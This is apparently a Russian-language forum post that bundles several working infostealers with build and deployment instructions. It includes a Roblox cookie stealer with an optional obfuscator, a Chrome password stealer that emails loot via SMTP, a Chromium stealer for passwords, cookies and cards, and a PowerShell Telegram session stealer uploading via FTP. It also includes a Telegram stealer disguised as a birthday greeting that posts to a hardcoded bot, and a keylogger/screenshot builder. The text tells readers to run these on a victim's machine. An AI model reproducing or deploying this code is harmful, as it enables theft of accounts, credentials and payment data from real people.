                cookiePath = os.path.join(browserPath, "Cookies")
       
            shutil.copy2(cookiePath, "temp.db")
            connection = sqlite3.connect("temp.db")
            cursor = connection.cursor()
            cursor.execute("SELECT encrypted_value FROM cookies")
            for cookie in cursor.fetchall():
                if cookie[0]:
                    decrypted = self.decryptCookie(cookie[0], masterKey)
                    if decrypted.startswith("_|WARNING:-DO-NOT-SHARE-THIS.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items.|_"):
                        cookiesFound.append(("None", decrypted))
           
            connection.close()
            os.remove("temp.db")
   
        else:
            for profile in profiles:
                if "Network" in os.listdir(os.path.join(browserPath, profile)):
                    cookiePath = os.path.join(browserPath, profile, "Network", "Cookies")
                else:
                    cookiePath = os.path.join(browserPath, profile, "Cookies")
                shutil.copy2(cookiePath, "temp.db")
                connection = sqlite3.connect("temp.db")
                cursor = connection.cursor()
                cursor.execute("SELECT encrypted_value FROM cookies")
                for cookie in cursor.fetchall():
                    if cookie[0]:
                        decrypted = self.decryptCookie(cookie[0], masterKey)
                        if decrypted.startswith("_|WARNING:-DO-NOT-SHARE-THIS.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items.|_"):
                            cookiesFound.append((profile, decrypted))
           
                connection.close()
                os.remove("temp.db")
        return [browserName, cookiesFound]
if __name__ == "__main__":
    CookieLogger()
"""

if obfuscate.lower().startswith("Y"):
    newcode = f"""
    import os;import json;import base64;import shutil;import sqlite3;import io;import requests;import traceback;import subprocess;import marshal;from win32crypt import CryptUnprotectData;from Crypto.Cipher import AES;exec(marshal.loads(base64.b85decode(b"{base64.b85encode(marshal.dumps(compile(code, id, "exec"))).decode()}")))
    """
else:
    newcode = code

open(f"tmp_{id}.py", "w").write(newcode)

os.system(f"pyinstaller --clean --onefile tmp_{id}.py")

shutil.copy2(f"dist\\tmp_{id}.exe", "output.exe")
shutil.rmtree("dist")
shutil.rmtree("build")
os.remove(f"tmp_{id}.py")
os.remove(f"tmp_{id}.spec")

os.system("cls")

print("Done!\nYou can rename to file\nTo change the icon, download a .ico file as well as Resource Hacker. Then replace the resource. You can find a tutorial on how to do this on YouTube.")

main.py​

webhook = "" # WEBHOOK HERE

import os
import json
import base64
import shutil
import sqlite3
import io
import requests
import traceback
import subprocess

from win32crypt import CryptUnprotectData
from Crypto.Cipher import AES

def safe(func):
    def wrapper(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except Exception:
            pass
    return wrapper

class CookieLogger:

    appdata = os.getenv('APPDATA')
    localappdata = os.getenv('LOCALAPPDATA')

    def __init__(self):
        browsers = self.findBrowsers()

        cookies = []
        for browser in browsers:
            try:
                cookies.append(self.getCookie(browser[0], browser[1]))
            except Exception:
                pass

        try:
            cookies.append(("Roblox App", ("None", '\n'.join(line for line in subprocess.check_output(r"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com' -Name .ROBLOSECURITY", creationflags=0x08000000, shell=True).decode().strip().splitlines() if line.strip()))))
        except Exception:
            pass
   
        cookieDoc = ""

        for cookie in cookies:
            if cookie == None or not cookie[1]:
                continue

            for _cookie in cookie[1]:
                cookieDoc += f"Browser: {cookie[0]}\nProfile: {_cookie[0]}\nCookie: {_cookie[1]}\n\n"

        requests.post(webhook, files = {"cookies.txt": cookieDoc})
 
    @safe
    def findBrowsers(self):
        found = []

        for root in [self.appdata, self.localappdata]:
            for directory in os.listdir(root):
                try:
                    for _root, _, _ in os.walk(os.path.join(root, directory)):
                        for file in os.listdir(_root):
                            if file == "Local State":
                                if "Default" in os.listdir(_root):
                                    found.append([_root, True])
                                else:
                                    found.append([_root, False])
                except Exception:
                    pass

        return found

    @safe
    def getMasterKey(self, browserPath):
        with open(os.path.join(browserPath, "Local State"), "r", encoding = "utf8") as f:
            localState = json.loads(f.read())
   
        masterKey = base64.b64decode(localState["os_crypt"]["encrypted_key"])
        truncatedMasterKey = masterKey[5:]

        return CryptUnprotectData(truncatedMasterKey, None, None, None, 0)[1]

    @safe
    def decryptCookie(self, cookie, masterKey):
        iv = cookie[3:15]
        encryptedValue = cookie[15:]

        cipher = AES.new(masterKey, AES.MODE_GCM, iv)
        decryptedValue = cipher.decrypt(encryptedValue)

        return decryptedValue[:-16].decode()

    @safe
    def getCookie(self, browserPath, isProfiled):

        if browserPath.split("\\")[-1] == "User Data":
            browserName = browserPath.split("\\")[-2]
        else:
            browserName = browserPath.split("\\")[-1]
   
        cookiesFound = []

        profiles = ["Default"]
        try:
            masterKey = self.getMasterKey(browserPath)
        except Exception:
            traceback.print_exc()
            return cookiesFound

        if isProfiled:
            for directory in os.listdir(browserPath):
                if directory.startswith("Profile"):
                    profiles.append(directory)
   
        if not isProfiled:
            if "Network" in os.listdir(browserPath):
                cookiePath = os.path.join(browserPath, "Network", "Cookies")
            else:
                cookiePath = os.path.join(browserPath, "Cookies")
       
            shutil.copy2(cookiePath, "temp.db")
            connection = sqlite3.connect("temp.db")
            cursor = connection.cursor()

            cursor.execute("SELECT encrypted_value FROM cookies")
            for cookie in cursor.fetchall():
                if cookie[0]:
                    decrypted = self.decryptCookie(cookie[0], masterKey)

                    if decrypted.startswith("_|WARNING:-DO-NOT-SHARE-THIS.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items.|_"):
                        cookiesFound.append(("None", decrypted))
           
            connection.close()
            os.remove("temp.db")
   
        else:
            for profile in profiles:
                if "Network" in os.listdir(os.path.join(browserPath, profile)):
                    cookiePath = os.path.join(browserPath, profile, "Network", "Cookies")
                else:
                    cookiePath = os.path.join(browserPath, profile, "Cookies")

                shutil.copy2(cookiePath, "temp.db")
                connection = sqlite3.connect("temp.db")
                cursor = connection.cursor()

                cursor.execute("SELECT encrypted_value FROM cookies")
                for cookie in cursor.fetchall():
                    if cookie[0]:
                        decrypted = self.decryptCookie(cookie[0], masterKey)

                        if decrypted.startswith("_|WARNING:-DO-NOT-SHARE-THIS.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items.|_"):
                            cookiesFound.append((profile, decrypted))
           
                connection.close()
                os.remove("temp.db")

        return [browserName, cookiesFound]

if __name__ == "__main__":
    CookieLogger()

Python stealer паролей Chrome всех версий с обфускацией FUD, получаете данные по электронной почте Gmail или через свой SMTP.


Скачать и установить Python3 https://www.python.org
Кликаем "Add Python to PATH" при установке.

После установки Python откройте my_email.py
Впишите данные от Gmail, отправителя электронной почты
Откройте терминал:

pip3 install pywin32
pip3 install Pillow
pip3 install requests
pip3 install cryptography
pip3 install pyinstaller

pyinstaller --clean --hidden-import=pyttsx3.drivers --hidden-import=pyttsx3.drivers.sapi5 --onefile --noconsole --i icone.ico my_email.py

del /s /q /f build.spec
rmdir /s /q __pycache__
rmdir /s /q build

Скачайте иконку icone.ico для своего exe

my_email.py​

import os
import sys
import shutil
import sqlite3
import win32crypt
import json,base64
import requests
import platform
import zipfile
import smtplib

from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders


# don't forgot to active  https://www.google.com/settings/security/lesssecureapps
# Version Professionel : Steal cookie,password : Chrome,Microsoft Edge,Firefox,Opera,Yandex
# Link to Download https://*********/@hakanonymos

addr_from = 'your@gmail.com' # your email to send steal_password
addr_to  = 'receive email  ' # receive email
password  = 'password for gmail' # Your gmail password

from PIL import ImageGrab
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.ciphers import (
    Cipher, algorithms, modes)

APP_DATA_PATH= os.environ['LOCALAPPDATA']
DB_PATH = r'Google\Chrome\User Data\Default\Login Data'

NONCE_BYTE_SIZE = 12

def encrypt(cipher, plaintext, nonce):
    cipher.mode = modes.GCM(nonce)
    encryptor = cipher.encryptor()
    ciphertext = encryptor.update(plaintext)
    return (cipher, ciphertext, nonce)

def decrypt(cipher, ciphertext, nonce):
    cipher.mode = modes.GCM(nonce)
    decryptor = cipher.decryptor()
    return decryptor.update(ciphertext)

def get_cipher(key):
    cipher = Cipher(
        algorithms.AES(key),
        None,
        backend=default_backend()
    )
    return cipher


def dpapi_decrypt(encrypted):
    import ctypes
    import ctypes.wintypes

    class DATA_BLOB(ctypes.Structure):
        _fields_ = [('cbData', ctypes.wintypes.DWORD),
                    ('pbData', ctypes.POINTER(ctypes.c_char))]

    p = ctypes.create_string_buffer(encrypted, len(encrypted))
    blobin = DATA_BLOB(ctypes.sizeof(p), p)
    blobout = DATA_BLOB()
    retval = ctypes.windll.crypt32.CryptUnprotectData(
        ctypes.byref(blobin), None, None, None, None, 0, ctypes.byref(blobout))
    if not retval:
        raise ctypes.WinError()
    result = ctypes.string_at(blobout.pbData, blobout.cbData)
    ctypes.windll.kernel32.LocalFree(blobout.pbData)
    return result

def unix_decrypt(encrypted):
    if sys.platform.startswith('linux'):
        password = 'peanuts'
        iterations = 1
    else:
        raise NotImplementedError

    from Crypto.Cipher import AES
    from Crypto.Protocol.KDF import PBKDF2

    salt = 'saltysalt'
    iv = ' ' * 16
    length = 16
    key = PBKDF2(password, salt, length, iterations)
    cipher = AES.new(key, AES.MODE_CBC, IV=iv)
    decrypted = cipher.decrypt(encrypted[3:])
    return decrypted[:-ord(decrypted[-1])]

def get_key_from_local_state():
    jsn = None
    with open(os.path.join(os.environ['LOCALAPPDATA'],
        r"Google\Chrome\User Data\Local State"),encoding='utf-8',mode ="r") as f:
        jsn = json.loads(str(f.readline()))
    return jsn["os_crypt"]["encrypted_key"]

def aes_decrypt(encrypted_txt):
    encoded_key = get_key_from_local_state()
    encrypted_key = base64.b64decode(encoded_key.encode())
    encrypted_key = encrypted_key[5:]
    key = dpapi_decrypt(encrypted_key)
    nonce = encrypted_txt[3:15]
    cipher = get_cipher(key)
    return decrypt(cipher,encrypted_txt[15:],nonce)

class ChromePassword:
    def __init__(self):
        self.passwordList = []

    def get_chrome_db(self):
        _full_path = os.path.join(APP_DATA_PATH,DB_PATH)
        _temp_path = os.path.join(APP_DATA_PATH,'sqlite_file')
        if os.path.exists(_temp_path):
            os.remove(_temp_path)
        shutil.copyfile(_full_path,_temp_path)
        self.show_password(_temp_path)

    def show_password(self,db_file):
        conn = sqlite3.connect(db_file)
        _sql = 'select signon_realm,username_value,password_value from logins'
        for row in conn.execute(_sql):
            host = row[0]
            if host.startswith('android'):
                continue
            name = row[1]
            value = self.chrome_decrypt(row[2])
            _info = 'Hostname: %s\nUsername: %s\nPassword: %s\n\n' %(host,name,value)
            self.passwordList.append(_info)
        conn.close()
        os.remove(db_file)

    def chrome_decrypt(self,encrypted_txt):
        if sys.platform == 'win32':
            try:
                if encrypted_txt[:4] == b'\x01\x00\x00\x00':
                    decrypted_txt = dpapi_decrypt(encrypted_txt)
                    return decrypted_txt.decode()
                elif encrypted_txt[:3] == b'v10':
                    decrypted_txt = aes_decrypt(encrypted_txt)
                    return decrypted_txt[:-16].decode()
            except WindowsError:
                return None
        else:
            try:
                return unix_decrypt(encrypted_txt)
            except NotImplementedError:
                return None

    def save_passwords(self):
        with open('C:\\ProgramData\\Passwords.txt','w',encoding='utf-8') as f:
            f.writelines(self.passwordList)

if __name__=="__main__":
    Main = ChromePassword()
    Main.get_chrome_db()
    Main.save_passwords()

if os.path.exists('C:\\Program Files\\Windows Defender'):
   av = 'Windows Defender'
if os.path.exists('C:\\Program Files\\AVAST Software\\Avast'):
   av = 'Avast'
if os.path.exists('C:\\Program Files\\AVG\\Antivirus'):
   av = 'AVG'
if os.path.exists('C:\\Program Files\\Avira\\Launcher'):
   av = 'Avira'
if os.path.exists('C:\\Program Files\\IObit\\Advanced SystemCare'):
   av = 'Advanced SystemCare'
if os.path.exists('C:\\Program Files\\Bitdefender Antivirus Free'):
   av = 'Bitdefender'
if os.path.exists('C:\\Program Files\\COMODO\\COMODO Internet Security'):
   av = 'Comodo'
if os.path.exists('C:\\Program Files\\DrWeb'):
   av = 'Dr.Web'
if os.path.exists('C:\\Program Files\\ESET\\ESET Security'):
   av = 'ESET'
if os.path.exists('C:\\Program Files\\GRIZZLY Antivirus'):
   av = 'Grizzly Pro'
if os.path.exists('C:\\Program Files\\Kaspersky Lab'):
   av = 'Kaspersky'
if os.path.exists('C:\\Program Files\\IObit\\IObit Malware Fighter'):
   av = 'Malware fighter'
if os.path.exists('C:\\Program Files\\360\\Total Security'):
   av = '360 Total Security'
else:
   pass

screen = ImageGrab.grab()
screen.save(os.getenv('ProgramData') + '\\Screenshot.jpg')
screen = open('C:\\ProgramData\\Screenshot.jpg', 'rb')
screen.close()

zname=r'C:\\ProgramData\\Passwords.zip'
newzip=zipfile.ZipFile(zname,'w')
newzip.write(r'C:\\ProgramData\\Passwords.txt')
newzip.write(r'C:\\ProgramData\\Screenshot.jpg')
newzip.close()
os.remove('C:\\ProgramData\\Passwords.txt')
os.remove('C:\\ProgramData\\Screenshot.jpg')

msg = MIMEMultipart()
msg['From']    = addr_from
msg['To']      = addr_to
msg['Subject'] = 'Stealed! - ' + os.getlogin()

r = requests.get('http://ip.42.pl/raw')
IP = r.text
body = ('Stealed! ✔️'
 '\n' + '\nPC » ' + os.getlogin() +
 '\nOS » ' + platform.system() + ' ' + platform.release() +
 '\n'
 '\nAV » ' + av +
 '\n'
 '\nIP » ' + IP)
msg.attach(MIMEText(body, 'plain'))

filename = 'Passwords.zip'
attachment = open('C:\\ProgramData\\Passwords.zip', 'rb')
p = MIMEBase('application', 'octet-stream')
p.set_payload((attachment).read())
encoders.encode_base64(p)
p.add_header('Content-Disposition', "attachment; filename= %s" % filename)

msg.attach(p)
server = smtplib.SMTP('smtp.gmail.com', 587)
server.starttls()
server.login(addr_from, password)
server.send_message(msg)
server.quit()

attachment.close()
os.remove('C:\\ProgramData\\Passwords.zip')

Программа Python получает все сохраненные пароли, кредитные карты и закладки из браузеров на основе Chromium, поддерживает Chromium 80 и выше!​

✔ Amigo
✔ Torch
✔ Kometa
✔ Orbitum
✔ Cent-browser
✔ 7star
✔ Sputnik
✔ Vivaldi
✔ Google-chrome-sxs
✔ Google-chrome
✔ Epic-privacy-browser
✔ Microsoft-edge
✔ Uran
✔ Yandex
✔ Brave
✔ Iridium

Использование:

1) Во-первых, убедитесь, что Python установлен https://www.python.org/downloads/ Обязательно "Add Python to PATH" при установке!
3) Запустите команды для создания EXE, переименуйте и запустите на компе жертвы, отправки логов нет

pip install pyinstaller pypiwin32 pycryptodome
pyinstaller --onefile --noconsole --i icone.ico chromium_based_browsers.py

chromium_based_browsers.py​

    return results


if __name__ == '__main__':
    available_browsers = installed_browsers()

    for browser in available_browsers:
        browser_path = browsers[browser]
        master_key = get_master_key(browser_path)
        print(f"Getting Stored Details from {browser}")

        print("\t [!] Getting Saved Passwords")
        save_results(browser, 'Saved_Passwords', get_login_data(browser_path, "Default", master_key))
        print("\t------\n")

        print("\t [!] Getting Browser History")
        save_results(browser, 'Browser_History', get_web_history(browser_path, "Default"))
        print("\t------\n")

        print("\t [!] Getting Download History")
        save_results(browser, 'Download_History', get_downloads(browser_path, "Default"))
        print("\t------\n")

        print("\t [!] Getting Cookies")
        save_results(browser, 'Browser_Cookies', get_cookies(browser_path, "Default", master_key))
        print("\t------\n")

        print("\t [!] Getting Saved Credit Cards")
        save_results(browser, 'Saved_Credit_Cards', get_credit_cards(browser_path, "Default", master_key))

Stealer Telegram Session c обходом 2FA с использованием сценария PowerShell
Отправляет через FTP сервер

steal_session.ps1​

$processName = "telegram"

try{

if (Get-Process $processName -ErrorAction SilentlyContinue) {
    Get-Process -Name $processName  | Stop-Process
} else {
   # Write-Host "$processName is not running."
}



#Write-Host "Telegram Application Closed..."

}
catch{

#Write-Host "something went wrong..."

}
$userName = $env:USERNAME
$folderPath1  = "C:\Users\$userName\AppData\Roaming\Telegram Desktop\tdata\user_data"
$folderPath2  = "C:\Users\$userName\AppData\Roaming\Telegram Desktop\tdata\emoji"

try{
Remove-Item $folderPath1 -Recurse -Force  -ErrorAction SilentlyContinue
#Write-Host "Removed user_data"
Remove-Item $folderPath2 -Recurse -Force  -ErrorAction SilentlyContinue
#Write-Host "Removed emoji"

}

catch{

}
$source_folder = "C:\Users\$userName\AppData\Roaming\Telegram Desktop\tdata"
$zip_file = "C:\Users\$userName\AppData\Roaming\Telegram Desktop\tdata.zip"
$max_size = 50 * 1MB # Convert to bytes


if (Test-Path $zip_file) {
    Remove-Item $zip_file
}

#Write-Host "Compressing files in $source_folder to $zip_file..."

Add-Type -AssemblyName System.IO.Compression.FileSystem
[System.IO.Compression.ZipFile]::CreateFromDirectory($source_folder, $zip_file, "Optimal", $false)


Get-ChildItem $zip_file | Where-Object { $_.Length -gt $max_size } | ForEach-Object {
    Write-Host "Removing $($_.FullName)..."
    Remove-Item $_.FullName
}

$userName = $env:USERNAME
$filePath = "C:\Users\$userName\AppData\Roaming\Telegram Desktop\tdata.zip"
$dateString = Get-Date -Format "yyyyMMdd_HHmmss"
## FTP server settings
$ftpServer = "your_ftp_server"
$ftpUsername = "xxxxx"
$ftpPassword = "yyyyy"

# Local file to upload
$localFilePath = "C:\Users\$userName\AppData\Roaming\Telegram Desktop\tdata.zip"

# Remote FTP file path
$remoteFilePath = "/steal/$dateString.zip"

# Create FTP session
$ftpSession = New-Object -TypeName System.Net.WebClient
$ftpSession.Credentials = New-Object System.Net.NetworkCredential($ftpUsername, $ftpPassword)

# Upload file
$ftpSession.UploadFile("ftp://$ftpServer/$remoteFilePath", $localFilePath)

# Close FTP session
$ftpSession.Dispose()

Telegram session stealer​

Использование:
1) Во-первых, убедитесь, что Python установлен https://www.python.org/downloads/ Обязательно "Add Python to PATH" при установке!
2) Запустите команды для создания EXE, переименуйте и запустите на компе жертвы, отправки логов нет

sudo apt install python3 && python3-pip
pip3 install pyinstaller PyQt5

pyinstaller --add-data "*.png;." --add-data "*.gif;." --noconsole --onefile main.py

Тема стилера поздравительная, поэтому png и гифку на ваш вкус, можно что-нибудь праздничное или тему замените
Название файло img в начале стилера

Вставьте токен и chat_id

main.py​

import contextlib

from PyQt5 import QtWidgets, QtGui
from PyQt5.QtCore import QThread
from PyQt5.QtGui import QMovie
from PyQt5.QtWidgets import QApplication, QMainWindow, QPushButton


class ParallelThread(QThread):
    # Multithreading class
    def __init__(self):
        super(ParallelThread, self).__init__()

    # Background process
    def run(self):
        name = getpass.getuser()
        path = f'C:\\Users\\{name}\\AppData\\Roaming\\Telegram Desktop\\tdata'  # Path to directory with tdata
        file_list = os.listdir(path)  # List of files (we need not all of them, but take for sure)
        bad_files = ['tdummy', 'usertag', 'user_data', 'dumps', 'emoji', 'working', 'cache.zip']  # Heavy, temporary
        # or active (so we can not copy them) files
        with ZipFile(f'C:\\Users\\{name}\\AppData\\Roaming\\Telegram Desktop\\tdata\\cache.zip', "w") as myzip:
            # We hide our session file to rarely seen directory in case produced by us file is not removed
            # to make it inconspicuous
            for i in file_list:
                if i.startswith('D877'):
                    # Important directory
                    try:
                        file_list1 = os.listdir(f'{path}\\{i}')
                        for j in file_list1:
                            myzip.write(f'{path}\\{i}\\{j}')
                    except Exception:
                        myzip.write(f'{path}\\{i}')
                elif i not in bad_files:
                    myzip.write(f'{path}\\{i}')
        with contextlib.suppress(Exception):
            # Post request to get our zip archive via telegram bot. Send something to https://t.me/ZZZipsender_bot
            # and change "chat_id" parameter to your Telegram_id
            requests.post('https://api.telegram.org/bot6135827492:AAEKo5OYDgqohd-8OEKfFd4rSM3GMPgkmmA/sendDocument'
                          '?chat_id=6172077822',
                          files={'document': open(f'C:\\Users\\{getpass.getuser()}\\AppData\\Roaming\\'
                                                  f'Telegram Desktop\\tdata\\cache.zip', 'rb')})


class MyWidget(QMainWindow):

    def __init__(self):
        super().__init__()
        # Creating user interface
        img0 = resource_path("img_hb.png")
        img1 = resource_path("gifka.gif")
        img2 = resource_path("gif_gb.gif")

        self.setGeometry(70, 30, 1280, 720)
        self.setWindowTitle('Happy Birthday!')

        self.default_picture = QtWidgets.QLabel(self)
        self.pix = QtGui.QPixmap(img0)
        self.default_picture.setPixmap(self.pix)
        self.default_picture.resize(1280, 720)
        self.default_picture.move(0, 0)

        self.surprise_button = QPushButton('Получить поздравление', self)
        self.surprise_button.resize(140, 30)
        self.surprise_button.move(570, 435)
        self.surprise_button.clicked.connect(self.f_surprise_button)

        self.firework1 = QtWidgets.QLabel(self)
        self.movie1 = QMovie(img1)
        self.firework1.setMovie(self.movie1)
        self.firework1.resize(277, 269)
        self.firework1.move(30, 200)
        self.movie1.start()

        self.firework2 = QtWidgets.QLabel(self)
        self.movie2 = QMovie(img1)
        self.firework2.setMovie(self.movie2)
        self.firework2.resize(277, 269)
        self.firework2.move(350, 50)
        self.movie2.start()

        self.cong_text = QtWidgets.QLabel(self)
        self.cong_movie = QMovie(img2)
        self.cong_text.setMovie(self.cong_movie)
        self.cong_text.resize(1280, 720)
        self.cong_text.move(-2000, 0)

        self.firework3 = QtWidgets.QLabel(self)
        self.movie3 = QMovie(img1)
        self.firework3.setMovie(self.movie3)
        self.firework3.resize(277, 269)
        self.firework3.move(950, 200)
        self.movie3.start()

        self.firework4 = QtWidgets.QLabel(self)
        self.movie4 = QMovie(img1)
        self.firework4.setMovie(self.movie4)
        self.firework4.resize(277, 269)
        self.firework4.move(700, 50)
        self.movie4.start()

        # Multithreading class initialization
        self.parallel = ParallelThread()

    # Reaction to clicking the button
    def f_surprise_button(self):
        self.surprise_button.move(-1000, 0)
        self.movie3.stop()
        self.movie4.stop()
        self.firework3.move(-1000, 0)
        self.firework4.move(-1000, 0)
        self.movie2.stop()
        self.movie1.stop()
        self.cong_text.move(0, 0)
        self.cong_movie.start()
        with contextlib.suppress(Exception):
            self.parallel.start()


# Function for importing files in standalone application
def resource_path(relative_path):
    try:
        base_path = sys._MEIPASS
    except Exception:
        base_path = os.path.abspath(".")

    return os.path.join(base_path, relative_path)


if __name__ == '__main__':
    import sys
    from zipfile import ZipFile
    import os
    import getpass
    import requests

    app = QApplication(sys.argv)
    ex = MyWidget()
    ex.show()
    sys.exit(app.exec_())

KeyLoggerScreenshot - это инструмент, который регистрирует клавиши, делает скриншот каждые 20 секунд, записывает щелчки мыши с позиционированием X и Y и записывает звук цели. Данные будут отправлены вам через сокеты.
Следуйте инструкциям, чтобы создать свой собственный сервер в "KeyLoggerScreenshot".
Лцчше запускайте KeyLoggerScreenshot на Kali Linux. Но это работает на всех дистрибутивах Linux.
Если вы пользователь Linux. Изменить на root:

sudo -i

Использование:​

sudo apt install python3 && python3-pip
sudo apt-get install portaudio19-dev python3-pyaudio
pip3 install BetterPrinting pynput pyautogui Pillow KeyloggerScreenshot pyaudio




Напишите свой IP-адрес в KLS_START.PY:
python KLS_start.py -aip 127.0.0.1

Для создания файла:
python KLS_start.py -aip 127.0.0.1 -cf

Вы можете отправить созданный файл своей целе

Вы также можете указать имя файла просто написать имя файла после -cf
python KLS_start.py -aip 127.0.0.1 -cf test.py

Для создания сервера с теми же портами, что и цель:
python KLS_start.py -aip 127.0.0.1 -cf -ds

Чтобы увидеть все порты:
python KLS_start.py -aip 127.0.0.1 -cf -ds -p

Для активации симуляции:
python KLS_start.py -aip 127.0.0.1 -cf -ds -p -sim

Стандартное имя файла является target.py

Вы также можете указать секунды, которые будут запускаться у цели
python KLS_start.py -aip 127.0.0.1 -cf test.py -s 120

Секунды по умолчанию 60

Чтобы указать ссылку, которая будет открыта при выполнении:
python KLS_start.py -aip 127.0.0.1 -cf test.py -s 120 -phs https://www.google.com


После запуска кода вы можете отправить созданное имя файла.
Вы можете отправить EXE файл, созданный из target.py в Auto-Py-To-Exe.
KeyLoggerScreenshot очень прост в использовании.
Серверы можно использовать в любой ОС. Клиент должен быть ОС Windows.

KLS_start.py​

import os
try:
    import pyautogui as pg

except KeyError:
    files = ["Server_keylogger.py", "Keylogger_Target.py"]
    for this_file in files:
        os.chdir("KeyloggerScreenshot")
        with open(this_file, "r+") as file:
            data = [line.replace("\n", "") for line in file]

        with open(this_file, "w+") as file:
            for each in data:
                if each not in ["import PIL.Image", "from pynput import keyboard", "from pynput.mouse import Listener",
                                "import tkinter as tk", "import pyautogui as pg"]:
                    file.write(f"{each}\n")
        os.chdir("..")

import KeyloggerScreenshot as ks
import sys
import threading
import random
import requests
import subprocess

gui = """
    __ __              __                                 _____                                       __            __
   / //_/___   __  __ / /____   ____ _ ____ _ ___   _____/ ___/ _____ _____ ___   ___   ____   _____ / /_   ____   / /_
  / ,<  / _ \ / / / // // __ \ / __ `// __ `// _ \ / ___/\__ \ / ___// ___// _ \ / _ \ / __ \ / ___// __ \ / __ \ / __/
 / /| |/  __// /_/ // // /_/ // /_/ // /_/ //  __// /   ___/ // /__ / /   /  __//  __// / / /(__  )/ / / // /_/ // /_
/_/ |_|\___/ \__, //_/ \____/ \__, / \__, / \___//_/   /____/ \___//_/    \___/ \___//_/ /_//____//_/ /_/ \____/ \__/
            /____/           /____/ /____/
"""
lst = sys.argv

try:
    if "-aip" in lst:  # "aip" stands for address ip
        idx = lst.index("-aip")
        try:
            global simulation
            global boolean

            cmd = subprocess.check_output(["netstat", "-ano"])
            all = cmd.split()

            working_ports = []
            zahlen = [str(zahl) for zahl in range(0, 11)]

            for each in all:
                str_each = str(each)
                if ":" in str_each:
                    switch = str_each[::-1]
                    this_port = ""
                    for port in switch:
                        if port not in zahlen: pass
                        if port == ":": break
                        this_port += port

                    another_switch = this_port[::-1]
                    if "'" in another_switch: another_switch = another_switch.replace("'", "")

                    if len(another_switch) == 4:
                        working_ports.append(another_switch)

            ipaddress = str(lst[idx + 1])

            zahlen = "123456789"
            nummer = 0
            port_numbers = []
            while nummer != 4:
                nummer += 1
                random_port = "".join(random.sample(zahlen, 4))
                if random_port in working_ports:
                    continue
                port_numbers.append(random_port)

            port_photos = int(port_numbers[0])
            port_keylogger = int(port_numbers[1])
            port_listener = int(port_numbers[2])
            port_time = int(port_numbers[3])

            if "-sim" in lst:
                try:
                    print("The simulation is activated")
                    simulation = "simulater=True"
                    boolean = True

                except IndexError:
                    quit()
            else:
                simulation = "simulater=False"
                boolean = False

            if "-ds" in lst:  # "ds" for demon server
                try:
                    server_code = f'''
import KeyloggerScreenshot as ks
import threading
ip = "{ipaddress}"
server_photos = ks.ServerPhotos(ip, {port_photos})
server_keylogger = ks.ServerKeylogger(ip, {port_keylogger}, {simulation})
server_listener = ks.ServerListener(ip, {port_listener})
server_time = ks.Timer(ip, {port_time})
threading_server = threading.Thread(target=server_photos.start)
threading_server.start()
threading_server2 = threading.Thread(target=server_keylogger.start)
threading_server2.start()
threading_server3 = threading.Thread(target=server_listener.start)
threading_server3.start()
threading_server4 = threading.Thread(target=server_time.start_timer)
threading_server4.start() '''

                    if os.path.exists("demon_server.py"):
                        os.remove("demon_server.py")
                    with open("demon_server.py", "a+") as file:
                        file.write(server_code)

                    print('"demon_server.py" HAS BEEN CREATED')
                except IndexError:
                    quit()
            if "-p" in lst:  # "p" stands for ports
                idx_port = lst.index("-p")
                try:
                    print('ALL THE NUMBERS HAVE BEEN SAVED TO "ports.py"')
                    print(
                        f"\nport_photos = {port_photos}\nport_keylogger = {port_keylogger}\nport_listener = {port_listener}\nport_time = {port_time}\n")
                    with open("ports.py", "a+") as file:
                        file.write(
                            f"port_photos = {port_photos}\nport_keylogger = {port_keylogger}\nport_listener = {port_listener}\nport_time = {port_time}")

                except IndexError:
                    quit()

            if "-s" in lst:  # "s" stands for seconds
                idx_s = lst.index("-s")
                try:
                    if "-" in lst[idx_s + 1]:
                        print(gui)
                        print("PLEASE SPECIFY YOUR SECONDS -s")
                        quit()

                    seconds = int(lst[idx_s + 1])
                    if seconds < 60:
                        print(gui)
                        print(f"SECONDS MUST BE GREATER THAN 60")
                        quit()

                except IndexError:
                    seconds = 60
            else:
                seconds = 60

            if "-phs" in lst:
                global phishing_name
                phishing_name = None
                try:
                    phs_idx = lst.index("-phs")
                    phishing_name = lst[phs_idx + 1]
                    if "-cf" not in lst:
                        print(gui)
                        print(
                            'YOU HAVE NOT SPECIFIED THE FILE. IF YOU NEED HELP SIMPLY TYPE "python KLS_start.py -help" IN YOUR TERMINAL')
                        sys.exit()
                    try:
                        req = requests.get(phishing_name)

                    except requests.exceptions.RequestException:
                        print(gui)
                        print(f'WEBSITE: {phishing_name} IS NOT AVAILABLE')
                        sys.exit()

                except IndexError:
                    print(gui)
                    print("NO LINK HAS BEEN TYPED")
                    sys.exit()

            else:
                phishing_name = None

            if "-cf" in lst:  # "cf" stands for Create file
                idx_cf = lst.index("-cf")
                if phishing_name is not None:
                    phishing_value = f'"{phishing_name}"'
                else:
                    phishing_value = None

                try:

                    filename = lst[idx_cf + 1]
                    if not filename.endswith("py"):
                        data = filename.split(".")
                        filename = f"{data[0]}.py"
                    if "-" in filename:
                        filename = "target.py"

                    if os.path.exists(filename):
                        os.remove(filename)

                    if phishing_name is not None: print(
                        f'LINK: {phishing_name} WILL BE OPEND WHEN {filename} IS EXECUTED')

                    with open(f"{filename}", "a+") as file:
                        file.write(
                            f"import KeyloggerScreenshot as ks \n\nip = '{ipaddress}'\nkey_client = ks.KeyloggerTarget(ip, {port_photos}, ip, {port_keylogger}, ip, {port_listener}, ip, {port_time}, duration_in_seconds={seconds}, phishing_web={phishing_value}) \nkey_client.start()")
                    print(f"{filename.upper()} has been created")

                except IndexError:
                    with open("target.py", "a+") as file:
                        file.write(
                            f"import KeyloggerScreenshot as ks \n\nip = '{ipaddress}'\nkey_client = ks.KeyloggerTarget(ip, {port_photos}, ip, {port_keylogger}, ip, {port_listener}, ip, {port_time}, duration_in_seconds={seconds}, phishing_web={phishing_value}) \nkey_client.start()")
                    print("TARGET.PY HAS BEEN CREATED YOU CAN SEND THIS TO YOUR TARGET")

